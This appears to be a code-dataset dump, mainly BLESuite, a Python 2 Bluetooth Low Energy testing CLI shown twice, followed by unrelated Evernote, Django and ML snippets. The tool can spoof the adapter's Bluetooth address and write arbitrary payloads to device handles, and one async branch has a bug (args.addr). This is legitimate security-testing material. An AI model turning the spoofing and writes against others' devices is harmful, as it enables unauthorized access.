action='store', help='\033[1m<subscribe>\033[0m '
'Selects which configuration to set'
'for a characteristic configuration descriptor.'
'0=off,1=notifications,2=indications,'
'3=notifications and inidications')
parser.add_argument('--timeout', metavar='timeout', default=[5],
type=int, nargs=1,
required=False, action='store',
help='\033[1m<lescan, read, write>\033[0m '
'Timeout (in seconds) for attempting to retrieve data from a device '
'(ie reading from a descriptor handle). (Default: 5 seconds)')
parser.add_argument('--subscribe-timeout', metavar='subscribe-timeout', default=[None],
type=int, nargs=1,
required=False, action='store',
help='\033[1m<subscribe>\033[0m '
'Time (in seconds) for attempting to retrieve data from a device '
'when listening for notifications or indications. (Default: Indefinite)')
# Device for discovery service can be specified
parser.add_argument('-i', '--adapter', metavar='adapter', default=[0],
type=int, nargs=1,
required=False, action='store',
help='\033[1m<all commands>\033[0m '
'Specify which Bluetooth adapter should be used. '
'These can be found by running (hcitool dev).')
parser.add_argument('-d', '--address', metavar='address', type=validators.validate_bluetooth_address_cli, nargs=1,
required=False, action='store',
help='\033[1m<all commands>\033[0m '
'Bluetooth address (BD_ADDR) of the target Bluetooth device')
parser.add_argument('-a', '--handles', metavar='handles', type=str, nargs="+",
required=False, action='store', default=[],
help='\033[1m<read, write>\033[0m '
'Hexadecimal handel list of characteristics to access (ex: 005a 006b). If '
'you want to access the value of a characteristic, use the handle_value '
'value from the service scan.')
parser.add_argument('-u', '--uuids', metavar='uuids', type=str, nargs="+",
required=False, action='store', default=[],
help='\033[1m<read>\033[0m '
'UUID list of characteristics to access. If '
'you want to access the value of a characteristic, use the UUID '
'value from the service scan.')
parser.add_argument('--data', metavar='data', type=str, nargs="+",
required=False, action='store', default=[],
help='\033[1m<write>\033[0m '
'Strings that you want to write to a handle (separated by spaces).')
parser.add_argument('--files', metavar='files', type=str, nargs="+",
required=False, action='store', default=[],
help='\033[1m<write>\033[0m '
'Files that contain data to write to handle (separated by spaces)')
parser.add_argument('--payload-delimiter', metavar='payload-delimiter', type=str, nargs=1,
required=False, action='store', default=["EOF"],
help='\033[1m<write>\033[0m '
'Specify a delimiter (string) to use when specifying data for BLE payloads.'
'For instance, if I want to send packets with payloads in a file separated'
'by a comma, supply \'--payload-delimiter ,\'. Supply EOF if you want the entire contents'
'of a file sent. (Default: EOF)')
parser.add_argument("-t", '--address-type', metavar='address-type', type=str, nargs=1,
required=False, action='store', default=['public'], choices=address_type_choices,
help='\033[1m<all commands>\033[0m '
'Type of BLE address you want to connect to [public | random].')
parser.add_argument('--version', action='version', version='%(prog)s ' + __version__)
parser.add_argument('--debug', action='store_true', help='\033[1m<all commands>\033[0m '
'Enable logging for debug statements.')
return parser.parse_args()
def process_args(args):
"""
Process command line tool arguments parsed by argparse
and call appropriate bleSuite functions.
:param args: parser.parse_args()
:return:
"""
command = args.command[0]
if args.debug:
logging.basicConfig(level=logging.DEBUG)
timeout = args.timeout[0] * 1000 # convert seconds to ms
if command == 'spoof':
import bdaddr
if args.address[0] == "":
print "Please specify an address to spoof."
else:
logger.debug("About to spoof to address %s for adapter %s" % (args.address[0], args.adapter[0]))
ret = bdaddr.bdaddr(("hci"+str(args.adapter[0])), args.address[0])
if ret == -1:
raise ValueError('Spoofing failed. Your device may not be supported.')
if command == 'scan':
print "BTLE Scan beginning"
with BLEConnectionManager(args.adapter[0], 'central') as connection_manager:
discovered = connection_manager.scan(timeout)
print "Discovered:"
for i in discovered.keys():
print "\t", i, "(public)" if discovered[i][0] == 0 else "(random)"
for h, j in enumerate(discovered[i][1]):
gap = connection_manager.decode_gap_data(str(discovered[i][1][h]))
info = connection_manager.generate_gap_data_dict(gap)
for k in info.keys():
print "\t\t", k + ":"
print "\t\t\t", info[k]
if command == 'smartscan':
print "BTLE Smart Scan beginning"
device = ble_run_smart_scan(args.address[0], args.adapter[0],
args.address_type[0], skip_device_info_query=args.skip_device_info_query,
attempt_read=args.smart_read,
timeout=timeout)
if command == 'servicescan':
print "BTLE Scanning Services"
ble_service_scan(args.address[0], args.adapter[0],
args.address_type[0])
if command == 'read':
if len(args.handles) <= 0 and len(args.uuids) <= 0:
print "ERROR: No handles or UUIDs supplied for read operation."
return
print "Reading value from handle or UUID"
if args.async:
uuidData, handleData = ble_service_read_async(args.address[0], args.adapter[0],
args.address_type[0],
args.handles, args.uuids,
timeout=timeout)
for dataTuple in handleData:
print "\nHandle:", "0x" + dataTuple[0]
print_data_and_hex(dataTuple[1], False)
'''
if isinstance(dataTuple[1][0], str):
utils.print_helper.print_data_and_hex(dataTuple[1], False)
else:
utils.print_helper.print_data_and_hex(dataTuple[1][1], False)'''
for dataTuple in uuidData:
print "\nUUID:", dataTuple[0]
print_data_and_hex(dataTuple[1], False)
'''
if isinstance(dataTuple[1][0], str):
utils.print_helper.print_data_and_hex(dataTuple[1], False)
else:
utils.print_helper.print_data_and_hex(dataTuple[1][1].received(), True)'''
else:
uuidData, handleData = ble_service_read(args.address[0], args.adapter[0],
args.address_type[0],
args.handles, args.uuids, timeout=timeout)
for dataTuple in handleData:
print "\nHandle:", "0x" + dataTuple[0]
print_data_and_hex(dataTuple[1], False)
for dataTuple in uuidData:
print "\nUUID:", dataTuple[0]
print_data_and_hex(dataTuple[1], False)
if command == 'write':
if len(args.handles) <= 0:
print "ERROR: No handles supplied for write operation. Note: Write operation does not support use of UUIDs."
return
print "Writing value to handle"
if args.async:
logger.debug("Async Write")
if len(args.data) > 0:
handleData = ble_service_write_async(args.address[0], args.adapter[0],
args.address_type[0],
args.handles, args.data,
timeout=timeout)
elif args.payload_delimiter[0] == 'EOF':
logger.debug("Payload Delimiter: EOF")
dataSet = []
for dataFile in args.files:
if dataFile is None:
continue
logger.debug("Reading file: %s", dataFile)
f = open(dataFile, 'r')
dataSet.append(f.read())
f.close()
logger.debug("Sending data set: %s" % dataSet)
handleData = ble_service_write_async(args.addr[0], args.adapter[0],
args.address_type[0],
args.handles, dataSet,
timeout=timeout)
logger.debug("Received data: %s" % handleData)
'''for dataTuple in handleData:
print "\nHandle:", "0x" + dataTuple[0]
utils.print_helper.print_data_and_hex(dataTuple[1], False)'''
else:
logger.debug("Payload Delimiter: %s", args.payload_delimiter[0])
dataSet = []
for dataFile in args.files:
if dataFile is None:
continue
f = open(dataFile, 'r')
data = f.read()
f.close()
data = data.split(args.payload_delimiter[0])
dataSet.extend(data)
logger.debug("Sending dataSet: %s" % dataSet)
handleData = ble_service_write_async(args.address[0], args.adapter[0],
args.address_type[0],
args.handles, dataSet,
timeout=timeout)
for dataTuple in handleData:
print "\nHandle:", "0x" + dataTuple[0]
print "Input:"
utils.print_helper.print_data_and_hex(dataTuple[2], False, prefix="\t")
print "Output:"
#if tuple[1][0] is a string, it means our cmdLineToolWrapper removed the GattResponse object
#due to a timeout, else we grab the GattResponse and its response data
if isinstance(dataTuple[1][0], str):
utils.print_helper.print_data_and_hex(dataTuple[1], False, prefix="\t")
else:
utils.print_helper.print_data_and_hex(dataTuple[1][1].received(), False, prefix="\t")
else:
logger.debug("Sync Write")
print args.data
if len(args.data) > 0:
handleData = ble_service_write(args.address[0], args.adapter[0],
args.address_type[0],
args.handles, args.data, timeout=timeout)
'''for dataTuple in handleData:
print "\nHandle:", "0x" + dataTuple[0]
utils.print_helper.print_data_and_hex(dataTuple[1], False)'''
elif args.payload_delimiter[0] == 'EOF':
logger.debug("Payload Delimiter: EOF")
dataSet = []
for dataFile in args.files:
if dataFile is None:
continue
logger.debug("Reading file: %s", dataFile)
f = open(dataFile, 'r')
dataSet.append(f.read())
f.close()
logger.debug("Sending data set: %s" % dataSet)
handleData = ble_service_write(args.address[0], args.adapter[0],
args.address_type[0],
args.handles, dataSet, timeout=timeout)
logger.debug("Received data: %s" % handleData)
'''for dataTuple in handleData:
print "\nHandle:", "0x" + dataTuple[0]
utils.print_helper.print_data_and_hex(dataTuple[1], False)'''
else:
logger.debug("Payload Delimiter: %s", args.payload_delimiter[0])
dataSet = []
for dataFile in args.files:
if dataFile is None:
continue
f = open(dataFile, 'r')
data = f.read()
f.close()
data = data.split(args.payload_delimiter[0])
dataSet.extend(data)
logger.debug("Sending dataSet: %s" % dataSet)
handleData = ble_service_write(args.address[0], args.adapter[0],
args.address_type[0],
args.handles, dataSet, timeout=timeout)
for dataTuple in handleData:
print "\nHandle:", "0x" + dataTuple[0]
print "Input:"
print_data_and_hex([dataTuple[2]], False, prefix="\t")
print "Output:"
print_data_and_hex(dataTuple[1], False, prefix="\t")
if command == 'subscribe':
print "Subscribing to device"
if args.subscribe_timeout[0] is not None:
timeout = args.subscribe_timeout[0] * 1000
else:
timeout = None
ble_handle_subscribe(args.address[0], args.handles, args.adapter[0],
args.address_type[0], args.mode[0], timeout)
return
def main():
"""
Main loop for BLESuite command line tool.
:return:
"""
args = parse_command()
process_args(args)
logger.debug("Args: %s" % args)
| 53.214092 | 120 | 0.503718 | import argparse
from blesuite.connection_manager import BLEConnectionManager
from blesuite_wrapper import ble_service_read, ble_service_read_async, ble_service_write, \
ble_handle_subscribe, ble_service_scan, ble_service_write_async, ble_run_smart_scan
from blesuite import utils
from blesuite.utils.print_helper import print_data_and_hex
from blesuite.utils import validators
import logging
__version__ = "2.0"
logger = logging.getLogger(__name__)
logger.addHandler(logging.NullHandler())
def parse_command():
"""
Creates parser and parses command line tool call.
:return: parsed arguments
"""
global __version__
#Dictionary of available commands. Place new commands here
cmd_choices = {'scan': "Scan for BTLE devices",
'smartscan': "Scan specified BTLE device for device information, services, characteristics "
"(including associated descriptors). Note: This scan takes longer than the service scan",
'servicescan': 'Scan specified address for all services, characteristics, and descriptors. ',
'read': "Read value from specified device and handle",
'write': "Write value to specific handle on a device. Specify the --data or --files options"
"to set the payload data. Only data or file data can be specified, not both"
"(data submitted using the data flag takes precedence over data in files).",
'subscribe': "Write specified value (0000,0100,0200,0300) to chosen handle and initiate listener.",
'spoof': 'Modify your Bluetooth adapter\'s BT_ADDR. Use --address to set the address. Some chipsets'
' may not be supported.'}
address_type_choices = ['public', 'random']
parser = argparse.ArgumentParser(prog="blesuite",
description='Bluetooh Low Energy (BTLE) tool set for communicating and '
'testing BTLE devices on the application layer.') # ,
# formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument('command', metavar='command', type=str, nargs=1,
action='store', choices=cmd_choices.keys(),
help='BLESuite command you would like to execute.' +
'The following are the currently supported commands:\n' +
'\n'.join(['\033[1m{}\033[0m: {}'.format(k, v) for k, v in cmd_choices.iteritems()]))
parser.add_argument('--async', action='store_true', help='\033[1m<read, write>\033[0m '
'Enable asynchronous writing/reading. Any output'
'will be displayed when received. This prevents'
'blocking.')
parser.add_argument('--skip-device-info-query', action='store_true', help='\033[1m<smartscan>\033[0m '
'When scanning a device, specify this flag'
'to force smartscan to skip querying the device'
'for common information such as device name. This'
'is helpful when devices do not implement these services.')
parser.add_argument('--smart-read', action='store_true', help='\033[1m<smartscan>\033[0m '
'When scanning a device, specify this flag'
'to force smartscan to attempt to read'
'from each discovered characteristic descriptor.'
'Note: This will increase scan time to handle'
'each read operation.')
parser.add_argument('-m', '--mode', metavar='mode', default=[1],
type=int, nargs=1, required=False,
action='store', help='\033[1m<subscribe>\033[0m '
'Selects which configuration to set'
'for a characteristic configuration descriptor.'
'0=off,1=notifications,2=indications,'
'3=notifications and inidications')
parser.add_argument('--timeout', metavar='timeout', default=[5],
type=int, nargs=1,
required=False, action='store',
help='\033[1m<lescan, read, write>\033[0m '
'Timeout (in seconds) for attempting to retrieve data from a device '
'(ie reading from a descriptor handle). (Default: 5 seconds)')
parser.add_argument('--subscribe-timeout', metavar='subscribe-timeout', default=[None],
type=int, nargs=1,
required=False, action='store',
help='\033[1m<subscribe>\033[0m '
'Time (in seconds) for attempting to retrieve data from a device '
'when listening for notifications or indications. (Default: Indefinite)')
# Device for discovery service can be specified
parser.add_argument('-i', '--adapter', metavar='adapter', default=[0],
type=int, nargs=1,
required=False, action='store',
help='\033[1m<all commands>\033[0m '
'Specify which Bluetooth adapter should be used. '
'These can be found by running (hcitool dev).')
parser.add_argument('-d', '--address', metavar='address', type=validators.validate_bluetooth_address_cli, nargs=1,
required=False, action='store',
help='\033[1m<all commands>\033[0m '
'Bluetooth address (BD_ADDR) of the target Bluetooth device')
parser.add_argument('-a', '--handles', metavar='handles', type=str, nargs="+",
required=False, action='store', default=[],
help='\033[1m<read, write>\033[0m '
'Hexadecimal handel list of characteristics to access (ex: 005a 006b). If '
'you want to access the value of a characteristic, use the handle_value '
'value from the service scan.')
parser.add_argument('-u', '--uuids', metavar='uuids', type=str, nargs="+",
required=False, action='store', default=[],
help='\033[1m<read>\033[0m '
'UUID list of characteristics to access. If '
'you want to access the value of a characteristic, use the UUID '
'value from the service scan.')
parser.add_argument('--data', metavar='data', type=str, nargs="+",
required=False, action='store', default=[],
help='\033[1m<write>\033[0m '
'Strings that you want to write to a handle (separated by spaces).')
parser.add_argument('--files', metavar='files', type=str, nargs="+",
required=False, action='store', default=[],
help='\033[1m<write>\033[0m '
'Files that contain data to write to handle (separated by spaces)')
parser.add_argument('--payload-delimiter', metavar='payload-delimiter', type=str, nargs=1,
required=False, action='store', default=["EOF"],
help='\033[1m<write>\033[0m '
'Specify a delimiter (string) to use when specifying data for BLE payloads.'
'For instance, if I want to send packets with payloads in a file separated'
'by a comma, supply \'--payload-delimiter ,\'. Supply EOF if you want the entire contents'
'of a file sent. (Default: EOF)')
parser.add_argument("-t", '--address-type', metavar='address-type', type=str, nargs=1,
required=False, action='store', default=['public'], choices=address_type_choices,
help='\033[1m<all commands>\033[0m '
'Type of BLE address you want to connect to [public | random].')
parser.add_argument('--version', action='version', version='%(prog)s ' + __version__)
parser.add_argument('--debug', action='store_true', help='\033[1m<all commands>\033[0m '
'Enable logging for debug statements.')
return parser.parse_args()
def process_args(args):
"""
Process command line tool arguments parsed by argparse
and call appropriate bleSuite functions.
:param args: parser.parse_args()
:return:
"""
command = args.command[0]
if args.debug:
logging.basicConfig(level=logging.DEBUG)
timeout = args.timeout[0] * 1000 # convert seconds to ms
if command == 'spoof':
import bdaddr
if args.address[0] == "":
print "Please specify an address to spoof."
else:
logger.debug("About to spoof to address %s for adapter %s" % (args.address[0], args.adapter[0]))
ret = bdaddr.bdaddr(("hci"+str(args.adapter[0])), args.address[0])
if ret == -1:
raise ValueError('Spoofing failed. Your device may not be supported.')
if command == 'scan':
print "BTLE Scan beginning"
with BLEConnectionManager(args.adapter[0], 'central') as connection_manager:
discovered = connection_manager.scan(timeout)
print "Discovered:"
for i in discovered.keys():
print "\t", i, "(public)" if discovered[i][0] == 0 else "(random)"
for h, j in enumerate(discovered[i][1]):
gap = connection_manager.decode_gap_data(str(discovered[i][1][h]))
info = connection_manager.generate_gap_data_dict(gap)
for k in info.keys():
print "\t\t", k + ":"
print "\t\t\t", info[k]
if command == 'smartscan':
print "BTLE Smart Scan beginning"
device = ble_run_smart_scan(args.address[0], args.adapter[0],
args.address_type[0], skip_device_info_query=args.skip_device_info_query,
attempt_read=args.smart_read,
timeout=timeout)
if command == 'servicescan':
print "BTLE Scanning Services"
ble_service_scan(args.address[0], args.adapter[0],
args.address_type[0])
if command == 'read':
if len(args.handles) <= 0 and len(args.uuids) <= 0:
print "ERROR: No handles or UUIDs supplied for read operation."
return
print "Reading value from handle or UUID"
if args.async:
uuidData, handleData = ble_service_read_async(args.address[0], args.adapter[0],
args.address_type[0],
args.handles, args.uuids,
timeout=timeout)
for dataTuple in handleData:
print "\nHandle:", "0x" + dataTuple[0]
print_data_and_hex(dataTuple[1], False)
'''
if isinstance(dataTuple[1][0], str):
utils.print_helper.print_data_and_hex(dataTuple[1], False)
else:
utils.print_helper.print_data_and_hex(dataTuple[1][1], False)'''
for dataTuple in uuidData:
print "\nUUID:", dataTuple[0]
print_data_and_hex(dataTuple[1], False)
'''
if isinstance(dataTuple[1][0], str):
utils.print_helper.print_data_and_hex(dataTuple[1], False)
else:
utils.print_helper.print_data_and_hex(dataTuple[1][1].received(), True)'''
else:
uuidData, handleData = ble_service_read(args.address[0], args.adapter[0],
args.address_type[0],
args.handles, args.uuids, timeout=timeout)
for dataTuple in handleData:
print "\nHandle:", "0x" + dataTuple[0]
print_data_and_hex(dataTuple[1], False)
for dataTuple in uuidData:
print "\nUUID:", dataTuple[0]
print_data_and_hex(dataTuple[1], False)
if command == 'write':
if len(args.handles) <= 0:
print "ERROR: No handles supplied for write operation. Note: Write operation does not support use of UUIDs."
return
print "Writing value to handle"
if args.async:
logger.debug("Async Write")
if len(args.data) > 0:
handleData = ble_service_write_async(args.address[0], args.adapter[0],
args.address_type[0],
args.handles, args.data,
timeout=timeout)
elif args.payload_delimiter[0] == 'EOF':
logger.debug("Payload Delimiter: EOF")
dataSet = []
for dataFile in args.files:
if dataFile is None:
continue
logger.debug("Reading file: %s", dataFile)
f = open(dataFile, 'r')
dataSet.append(f.read())
f.close()
logger.debug("Sending data set: %s" % dataSet)
handleData = ble_service_write_async(args.addr[0], args.adapter[0],
args.address_type[0],
args.handles, dataSet,
timeout=timeout)
logger.debug("Received data: %s" % handleData)
'''for dataTuple in handleData:
print "\nHandle:", "0x" + dataTuple[0]
utils.print_helper.print_data_and_hex(dataTuple[1], False)'''
else:
logger.debug("Payload Delimiter: %s", args.payload_delimiter[0])
dataSet = []
for dataFile in args.files:
if dataFile is None:
continue
f = open(dataFile, 'r')
data = f.read()
f.close()
data = data.split(args.payload_delimiter[0])
dataSet.extend(data)
logger.debug("Sending dataSet: %s" % dataSet)
handleData = ble_service_write_async(args.address[0], args.adapter[0],
args.address_type[0],
args.handles, dataSet,
timeout=timeout)
for dataTuple in handleData:
print "\nHandle:", "0x" + dataTuple[0]
print "Input:"
utils.print_helper.print_data_and_hex(dataTuple[2], False, prefix="\t")
print "Output:"
#if tuple[1][0] is a string, it means our cmdLineToolWrapper removed the GattResponse object
#due to a timeout, else we grab the GattResponse and its response data
if isinstance(dataTuple[1][0], str):
utils.print_helper.print_data_and_hex(dataTuple[1], False, prefix="\t")
else:
utils.print_helper.print_data_and_hex(dataTuple[1][1].received(), False, prefix="\t")
else:
logger.debug("Sync Write")
print args.data
if len(args.data) > 0:
handleData = ble_service_write(args.address[0], args.adapter[0],
args.address_type[0],
args.handles, args.data, timeout=timeout)
'''for dataTuple in handleData:
print "\nHandle:", "0x" + dataTuple[0]
utils.print_helper.print_data_and_hex(dataTuple[1], False)'''
elif args.payload_delimiter[0] == 'EOF':
logger.debug("Payload Delimiter: EOF")
dataSet = []
for dataFile in args.files:
if dataFile is None:
continue
logger.debug("Reading file: %s", dataFile)
f = open(dataFile, 'r')
dataSet.append(f.read())
f.close()
logger.debug("Sending data set: %s" % dataSet)
handleData = ble_service_write(args.address[0], args.adapter[0],
args.address_type[0],
args.handles, dataSet, timeout=timeout)
logger.debug("Received data: %s" % handleData)
'''for dataTuple in handleData:
print "\nHandle:", "0x" + dataTuple[0]
utils.print_helper.print_data_and_hex(dataTuple[1], False)'''
else:
logger.debug("Payload Delimiter: %s", args.payload_delimiter[0])
dataSet = []
for dataFile in args.files:
if dataFile is None:
continue
f = open(dataFile, 'r')
data = f.read()
f.close()
data = data.split(args.payload_delimiter[0])
dataSet.extend(data)
logger.debug("Sending dataSet: %s" % dataSet)
handleData = ble_service_write(args.address[0], args.adapter[0],
args.address_type[0],
args.handles, dataSet, timeout=timeout)
for dataTuple in handleData:
print "\nHandle:", "0x" + dataTuple[0]
print "Input:"
print_data_and_hex([dataTuple[2]], False, prefix="\t")
print "Output:"
print_data_and_hex(dataTuple[1], False, prefix="\t")
if command == 'subscribe':
print "Subscribing to device"
if args.subscribe_timeout[0] is not None:
timeout = args.subscribe_timeout[0] * 1000
else:
timeout = None
ble_handle_subscribe(args.address[0], args.handles, args.adapter[0],
args.address_type[0], args.mode[0], timeout)
return
def main():
"""
Main loop for BLESuite command line tool.
:return:
"""
args = parse_command()
process_args(args)
logger.debug("Args: %s" % args)
| 0 | 0 | 0 |
39aeba465593157cc9fb66cd31b7e29f8c8eba57 | 370 | py | Python | sample/sample1_make_notebook.py | mtb-beta/evernote-api-sample | ff441da01b7c8075ad31fca7d22127fe4ceb7866 | [
"MIT"
] | null | null | null | sample/sample1_make_notebook.py | mtb-beta/evernote-api-sample | ff441da01b7c8075ad31fca7d22127fe4ceb7866 | [
"MIT"
] | null | null | null | sample/sample1_make_notebook.py | mtb-beta/evernote-api-sample | ff441da01b7c8075ad31fca7d22127fe4ceb7866 | [
"MIT"
] | null | null | null | """
NOTE: ノートブックを作成するサンプル
"""
from decouple import config
from pyevernote import EvernoteApp
TOKEN = config("EVERNOTE_DEVELOPPER_TOKEN")
USE_SANDBOX = config("USE_SANDBOX", True, cast=bool)
if __name__ == "__main__":
main()
| 20.555556 | 68 | 0.751351 | """
NOTE: ノートブックを作成するサンプル
"""
from decouple import config
from pyevernote import EvernoteApp
TOKEN = config("EVERNOTE_DEVELOPPER_TOKEN")
USE_SANDBOX = config("USE_SANDBOX", True, cast=bool)
def main():
evernote_app = EvernoteApp(token=TOKEN, use_sandbox=USE_SANDBOX)
evernote_app.create_notebook("My Sample Notebook3")
if __name__ == "__main__":
main()
| 115 | 0 | 23 |
93c19bda05ff270d52ae3931fc78f2d516181331 | 422 | py | Python | avishan/migrations/0005_baseuser_language.py | Afshari9978/django-avishan | 67b997e1063a1f2cf17699eaa292a98844aa0fe9 | [
"MIT"
] | 1 | 2021-05-09T09:55:54.000Z | 2021-05-09T09:55:54.000Z | avishan/migrations/0005_baseuser_language.py | Afshari9978/django-avishan | 67b997e1063a1f2cf17699eaa292a98844aa0fe9 | [
"MIT"
] | null | null | null | avishan/migrations/0005_baseuser_language.py | Afshari9978/django-avishan | 67b997e1063a1f2cf17699eaa292a98844aa0fe9 | [
"MIT"
] | null | null | null | # Generated by Django 3.0.3 on 2020-02-15 22:28
from django.db import migrations, models
| 22.210526 | 66 | 0.620853 | # Generated by Django 3.0.3 on 2020-02-15 22:28
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('avishan', '0004_usergroup_authenticate_with_phone_otp'),
]
operations = [
migrations.AddField(
model_name='baseuser',
name='language',
field=models.CharField(default='EN', max_length=255),
),
]
| 0 | 308 | 23 |
c36aea22e9c375be0d8543ddc1eba0ff9f8acd15 | 258 | py | Python | students/K33422/laboratory_works/Daria Plotskaya/lab_2/users/urls.py | olticher/ITMO_ICT_WebDevelopment_2021-2022 | 3de8728c29638d6733ad0664bf13e0d1eccae899 | [
"MIT"
] | null | null | null | students/K33422/laboratory_works/Daria Plotskaya/lab_2/users/urls.py | olticher/ITMO_ICT_WebDevelopment_2021-2022 | 3de8728c29638d6733ad0664bf13e0d1eccae899 | [
"MIT"
] | null | null | null | students/K33422/laboratory_works/Daria Plotskaya/lab_2/users/urls.py | olticher/ITMO_ICT_WebDevelopment_2021-2022 | 3de8728c29638d6733ad0664bf13e0d1eccae899 | [
"MIT"
] | null | null | null | from django.urls import path
from django.contrib.auth.views import LoginView
from .views import UserCreateFormView
urlpatterns = [
path("login/", LoginView.as_view(), name="login"),
path("register/", UserCreateFormView.as_view(), name="register")
]
| 28.666667 | 68 | 0.744186 | from django.urls import path
from django.contrib.auth.views import LoginView
from .views import UserCreateFormView
urlpatterns = [
path("login/", LoginView.as_view(), name="login"),
path("register/", UserCreateFormView.as_view(), name="register")
]
| 0 | 0 | 0 |
4d0fba564fa46a0b48e5aa0c5c73cd2775df2ea9 | 15,765 | py | Python | CLOUD_ML_newaccuracy_4person.py | qqxx6661/Trajectory-prediction | c5f783bdbb14c98e9d6be60c1624c65b9110b6b3 | [
"Apache-2.0"
] | 2 | 2018-09-27T06:57:28.000Z | 2019-07-13T12:15:48.000Z | CLOUD_ML_newaccuracy_4person.py | qqxx6661/Trajectory-prediction | c5f783bdbb14c98e9d6be60c1624c65b9110b6b3 | [
"Apache-2.0"
] | null | null | null | CLOUD_ML_newaccuracy_4person.py | qqxx6661/Trajectory-prediction | c5f783bdbb14c98e9d6be60c1624c65b9110b6b3 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python3
# coding=utf-8
import numpy as np
from sklearn.svm import SVC
from sklearn.externals import joblib
from sklearn import linear_model
from sklearn.neural_network import MLPClassifier
from sklearn.preprocessing import StandardScaler
from sklearn.tree import DecisionTreeClassifier
import time
if __name__ == '__main__':
glo_start = time.time()
test_file = "gallery/15-21/15-21_person_1_ML.csv"
# 180s
# train_file = ['gallery/14-23/14-23_person_0_ML.csv', 'gallery/14-23/14-23_person_1_ML.csv',
# 'gallery/14-23/14-23_person_2_ML.csv']
# 360s
train_file = ['gallery/14-12/14-12_person_0_ML.csv', 'gallery/14-12/14-12_person_1_ML.csv',
'gallery/14-12/14-12_person_2_ML.csv', 'gallery/14-14/14-14_person_0_ML.csv',
'gallery/14-14/14-14_person_1_ML.csv', 'gallery/14-14/14-14_person_2_ML.csv']
# 720s
# train_file = ['gallery/14-12/14-12_person_0_ML.csv', 'gallery/14-12/14-12_person_1_ML.csv',
# 'gallery/14-12/14-12_person_2_ML.csv', 'gallery/14-14/14-14_person_0_ML.csv',
# 'gallery/14-14/14-14_person_1_ML.csv', 'gallery/14-14/14-14_person_2_ML.csv',
# 'gallery/14-23/14-23_person_0_ML.csv', 'gallery/14-23/14-23_person_1_ML.csv',
# 'gallery/14-23/14-23_person_2_ML.csv', 'gallery/14-32/14-32_person_0_ML.csv',
# 'gallery/14-32/14-32_person_1_ML.csv', 'gallery/14-32/14-32_person_2_ML.csv',]
# 720s
# train_file = ['gallery/14-32/14-32_person_0_ML.csv', 'gallery/14-32/14-32_person_1_ML.csv',
# 'gallery/14-32/14-32_person_2_ML.csv',
# 'gallery/14-36/14-36_person_0_ML.csv', 'gallery/14-36/14-36_person_1_ML.csv',
# 'gallery/14-36/14-36_person_2_ML.csv',
# 'gallery/14-38/14-38_person_0_ML.csv', 'gallery/14-38/14-38_person_1_ML.csv',
# 'gallery/14-38/14-38_person_2_ML.csv',
# 'gallery/14-45/14-45_person_0_ML.csv', 'gallery/14-45/14-45_person_1_ML.csv',
# 'gallery/14-45/14-45_person_2_ML.csv']
# 3480s
# train_file = ['gallery/14-08/14-08_person_0_ML.csv', 'gallery/14-08/14-08_person_1_ML.csv',
# 'gallery/14-08/14-08_person_2_ML.csv',
# 'gallery/14-12/14-12_person_0_ML.csv', 'gallery/14-12/14-12_person_1_ML.csv',
# 'gallery/14-12/14-12_person_2_ML.csv',
# 'gallery/14-14/14-14_person_0_ML.csv', 'gallery/14-14/14-14_person_1_ML.csv',
# 'gallery/14-14/14-14_person_2_ML.csv',
# 'gallery/14-23/14-23_person_0_ML.csv', 'gallery/14-23/14-23_person_1_ML.csv',
# 'gallery/14-23/14-23_person_2_ML.csv',
# 'gallery/14-32/14-32_person_0_ML.csv', 'gallery/14-32/14-32_person_1_ML.csv',
# 'gallery/14-32/14-32_person_2_ML.csv',
# 'gallery/14-36/14-36_person_0_ML.csv', 'gallery/14-36/14-36_person_1_ML.csv',
# 'gallery/14-36/14-36_person_2_ML.csv',
# 'gallery/14-38/14-38_person_0_ML.csv', 'gallery/14-38/14-38_person_1_ML.csv',
# 'gallery/14-38/14-38_person_2_ML.csv',
# 'gallery/14-45/14-45_person_0_ML.csv', 'gallery/14-45/14-45_person_1_ML.csv',
# 'gallery/14-45/14-45_person_2_ML.csv',
# 'gallery/14-52/14-52_person_0_ML.csv', 'gallery/14-52/14-52_person_1_ML.csv',
# 'gallery/14-52/14-52_person_2_ML.csv',
# 'gallery/14-55/14-55_person_0_ML.csv', 'gallery/14-55/14-55_person_1_ML.csv',
# 'gallery/14-55/14-55_person_2_ML.csv',
# 'gallery/14-58/14-58_person_0_ML.csv', 'gallery/14-58/14-58_person_1_ML.csv',
# 'gallery/14-58/14-58_person_2_ML.csv',
# 'gallery/15-00/15-00_person_0_ML.csv', 'gallery/15-00/15-00_person_1_ML.csv',
# 'gallery/15-00/15-00_person_2_ML.csv',
# 'gallery/15-14/15-14_person_0_ML.csv', 'gallery/15-14/15-14_person_1_ML.csv',
# 'gallery/15-14/15-14_person_2_ML.csv', 'gallery/15-14/15-14_person_3_ML.csv',
# 'gallery/15-18/15-18_person_0_ML.csv', 'gallery/15-18/15-18_person_1_ML.csv',
# 'gallery/15-18/15-18_person_2_ML.csv', 'gallery/15-18/15-18_person_3_ML.csv',
# 'gallery/15-21/15-21_person_0_ML.csv', 'gallery/15-21/15-21_person_1_ML.csv',
# 'gallery/15-21/15-21_person_2_ML.csv', 'gallery/15-21/15-21_person_3_ML.csv',
# 'gallery/15-28/15-28_person_0_ML.csv', 'gallery/15-28/15-28_person_1_ML.csv',
# 'gallery/15-28/15-28_person_2_ML.csv', 'gallery/15-28/15-28_person_3_ML.csv',
# 'gallery/15-28/15-28_person_4_ML.csv',
# 'gallery/15-36/15-36_person_0_ML.csv', 'gallery/15-36/15-36_person_1_ML.csv',
# 'gallery/15-36/15-36_person_2_ML.csv', 'gallery/15-36/15-36_person_3_ML.csv',
# 'gallery/15-36/15-36_person_4_ML.csv',
# ]
input_frame_number = 3 # 输入学习帧数
input_label_delay = [1, 3, 9, 15, 30, 45] # 预测样本和标签差
train_model(train_file, input_frame_number, input_label_delay)
cal_accuracy(test_file, input_frame_number, input_label_delay)
glo_end = time.time()
print('global', glo_end - glo_start)
| 43.549724 | 101 | 0.577101 | #!/usr/bin/env python3
# coding=utf-8
import numpy as np
from sklearn.svm import SVC
from sklearn.externals import joblib
from sklearn import linear_model
from sklearn.neural_network import MLPClassifier
from sklearn.preprocessing import StandardScaler
from sklearn.tree import DecisionTreeClassifier
import time
def _generate_path(path_list):
path_stack = []
for cam_id in path_list: # 画出每次的实际路线堆栈
if cam_id not in ['0', '1', '2', '3', '4', '5']: # 只判断实际6个cam内情况
continue
if not path_stack:
path_stack.append(cam_id)
